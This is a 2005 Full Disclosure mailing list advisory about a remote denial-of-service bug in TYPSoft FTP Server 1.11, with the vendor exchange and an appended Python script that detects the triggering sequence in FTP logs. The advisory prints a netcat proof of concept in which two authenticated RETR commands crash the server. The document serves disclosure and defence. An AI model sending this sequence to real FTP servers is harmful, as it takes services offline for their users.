Full Disclosure mailing list archives
TYPSoft ftpd
From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Thu, 13 Oct 2005 13:15:45 -0700
EXPL-A-2005-016 exploitlabs.com Advisory 045

AFFECTED PRODUCTS
TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/

OVERVIEW
TYPSoft FTP Server is a fast and easy ftp server with support to Standard FTP Command, Clean interface, Virtual File System architecture, ability to resume Download and Upload, IP Restriction, Login/Quit message, logs, Multi Language and many other things.

DETAILS
1. DOS

Typsoft ftp server does not properly support the RETR command when "Sub Directory Include" is checked in the user config.

This is exploitable by authenticated users to TYPSoft ftpd.

POC
1. by requesting 2 RETR [string] commands in succession

C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
C:\>

Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"

note: string length has no effect and does not appear exploitable.

SOLUTION:
vendor contact: Oct 10, 2005
webmaster () typsoft com

response:
---------
Well I don't see any security problem except that TFS will raise an error because the socket was not open on the second RETR

It's more a bug than a security problem except if you show me the opposite.

Marc
TYPSoft

reply:
------
see attached perl POC
http://www.exploitlabs.com/files/advisories/typsoft-poc.zip
it demonstrates a full crash ( program exit ) from remote.

note: a remote DOS[crash] is classified as a security issue, even if it does not lead to compromise, due to the fact that a remote user ( not administrative ) can disable[crash] a (needed) service.

response:
---------
[none]

CREDITS
This vulnerability was discovered and researched by Donnie Werner of exploitlabs

mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
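
For operators who want to spot the command sequence from the POC in their own FTP command logs, the following is an added example and not part of the advisory or of TYPSoft's code. It flags any transfer command sent without a preceding PORT/PASV in the same session; the log line format, the sample log and all function names are assumptions made for illustration.

```python
import re
from collections import namedtuple

# Constructed log format (an assumption, not TYPSoft's own log layout):
#   <time> <session-id> <FTP command line as sent by the client>
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+([A-Za-z]{3,4})\b\s*(.*)$")

ARM = {"PORT", "PASV", "EPRT", "EPSV"}                       # set up a data connection
TRANSFER = {"RETR", "STOR", "STOU", "APPE", "LIST", "NLST"}  # use one up

Finding = namedtuple("Finding", "time session command arg")

def find_unarmed_transfers(lines):
    """Return transfer commands issued with no data connection set up."""
    armed = {}      # session id -> True while a PORT/PASV is pending
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a client command line in the assumed format
        time, session, verb, arg = m.groups()
        verb = verb.upper()
        if verb in ARM:
            armed[session] = True
        elif verb in TRANSFER:
            if not armed.get(session, False):
                findings.append(Finding(time, session, verb, arg))
            armed[session] = False  # each transfer consumes its data connection
        elif verb in ("QUIT", "REIN"):
            armed.pop(session, None)
    return findings

# Constructed sample: s1 is a normal client, s2 repeats the advisory's sequence.
SAMPLE_LOG = """\
13:15:01 s1 USER alice
13:15:01 s1 PASS ****
13:15:02 s1 PASV
13:15:02 s1 RETR report.txt
13:15:03 s1 PASV
13:15:03 s1 RETR notes.txt
13:15:10 s2 USER ok
13:15:10 s2 PASS ok
13:15:11 s2 RETR 0
13:15:11 s2 RETR 0
""".splitlines()

if __name__ == "__main__":
    for f in find_unarmed_transfers(SAMPLE_LOG):
        print(f"{f.time} session={f.session} {f.command} {f.arg!r} with no PORT/PASV")
```

This is a heuristic: it treats every PORT/PASV request as successful and does not read server reply codes.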